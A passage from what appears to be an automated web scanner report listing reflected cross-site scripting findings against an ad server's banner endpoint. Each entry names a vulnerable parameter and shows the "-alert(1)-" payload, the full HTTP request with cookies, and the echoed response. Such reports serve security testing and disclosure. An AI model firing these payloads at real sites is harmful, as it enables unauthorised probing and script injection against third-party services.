Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21cf16f"-alert(1)-"7e369353b08&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.27. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37ee0"-alert(1)-"3d34f88242f was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=
...[SNIP]...

3.28. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73396"-alert(1)-"18438590649 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
22/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&ev
...[SNIP]...

3.29. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fcf"-alert(1)-"47f798ca518 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

3.30. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e43bb"-alert(1)-"1134bc564bc was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

3.31. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb41b"-alert(1)-"3856831bc1c was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
9/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/htt
...[SNIP]...

3.32. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d07d0"-alert(1)-"428cd6eea0d was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
m/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
va
...[SNIP]...

3.33. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a1f"-alert(1)-"2ca852a0d31 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6990
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:26:52 GMT
Expires: Wed, 27 Apr 2011 23:26:52 GMT



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

3.34. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931fa"-alert(1)-"bfe7ab35173 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
40390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.35. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f38f"-alert(1)-"85e64b01986 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0
...[SNIP]...

3.36. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8ec7"-alert(1)-"ec811ea4808 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.2
...[SNIP]...

3.37. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89d47"-alert(1)-"6396b7e7268 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

